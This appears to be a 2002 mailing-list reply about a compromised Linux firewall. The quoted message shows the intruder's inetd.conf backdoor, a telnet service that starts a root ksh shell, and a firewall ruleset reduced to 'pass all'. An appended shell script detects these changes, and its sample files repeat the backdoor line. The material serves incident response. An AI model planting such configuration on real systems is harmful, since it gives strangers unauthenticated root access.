[Gllug] My firewall is rooted
John HEARNS
john.hearns at cern.ch
Mon Jul 15 13:43:23 UTC 2002
On Mon, 2002-07-15 at 14:26, Stephen Harker wrote:
> On Monday 15 July 2002 12:29, Xander D Harkness wrote:
> > I would expect there to be at least two or three back doors.
>
> Well here's one...
> My inetd.conf file was renamed to inetd.conf.gay
> and the new one says...
>
> telnet stream tcp nowait root /bin/ksh ksh
>
> So that's pretty obvious.
> And my pf.conf rule became pf.conf.gay and the new one says...
>
> pass in all
> pass out all
>
> Which doesn't make it much of a firewall anymore :-(
> CRAP!!
>
As Huw says, a good learning experience.
How about bringing the rogue disk along to a meeting?
We can keep it in a cage and poke sticks at it.
Seriously though - how about a writeup, and maybe
a short talk?
* this is how I discovered that there was a compromise
* steps I took to immediately recover
* forensic traces
* tools you might use
* etc
--
Gllug mailing list - Gllug at linux.co.uk
http://list.ftech.net/mailman/listinfo/gllug
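
An added example, not part of the original thread or written by its participants: a small audit for the two changes quoted above, a root shell bound to an inetd service and a pf ruleset reduced to unrestricted pass rules, plus a check for renamed originals left beside a config. The function names, the keyword heuristic and the sample files are assumptions constructed for illustration.

```shell
#!/bin/sh
# Flag inetd.conf entries that start a shell as root for whoever connects.
# Fields: service socktype proto wait user server-program args...
audit_inetd() {
    awk '
        /^[ \t]*#/ { next }                       # skip comments
        NF >= 6 {
            user = $5; sub(/[.:].*/, "", user)    # drop optional group part
            n = split($6, p, "/")                 # p[n] = basename of server
            if (user == "root" && p[n] ~ /^(sh|ksh|csh|tcsh|bash|zsh)$/)
                printf "%s:%d: root shell on %s: %s\n", FILENAME, FNR, $1, $0
        }' "$1"
}

# Flag pf.conf pass rules with no restriction, e.g. "pass in all".
# Heuristic: the rule consists only of direction/quick/log keywords plus "all".
audit_pf() {
    awk '
        { raw = $0; sub(/#.*/, "") }              # strip trailing comments
        $1 == "pass" {
            wide = 0
            for (i = 2; i <= NF; i++) {
                if ($i == "all") wide = 1
                else if ($i !~ /^(in|out|quick|log)$/) { wide = 0; break }
            }
            if (wide) printf "%s:%d: unrestricted rule: %s\n", FILENAME, FNR, raw
        }' "$1"
}

# List siblings such as inetd.conf.<suffix>, which may be a renamed original.
find_renamed() {
    for f in "$1".*; do
        [ -e "$f" ] && printf '%s: possible renamed original\n' "$f"
    done
    return 0
}

# Constructed sample files reproducing the state described in the message.
make_samples() {
    d=$(mktemp -d) || return 1
    printf '%s\n' '# constructed' 'ftp stream tcp nowait root /usr/libexec/ftpd ftpd' > "$d/inetd.conf.orig"
    printf '%s\n' 'telnet stream tcp nowait root /bin/ksh ksh' > "$d/inetd.conf"
    printf '%s\n' 'pass in all' 'pass out all' > "$d/pf.conf"
    printf '%s\n' "$d"
}

# Demo run on the constructed samples; call the functions on real files instead.
d=$(make_samples) && { audit_inetd "$d/inetd.conf"; audit_pf "$d/pf.conf"; find_renamed "$d/inetd.conf"; rm -rf "$d"; }
```

On a host suspected of compromise, run such checks from trusted media against the mounted disk, since the installed awk and sh may themselves have been replaced.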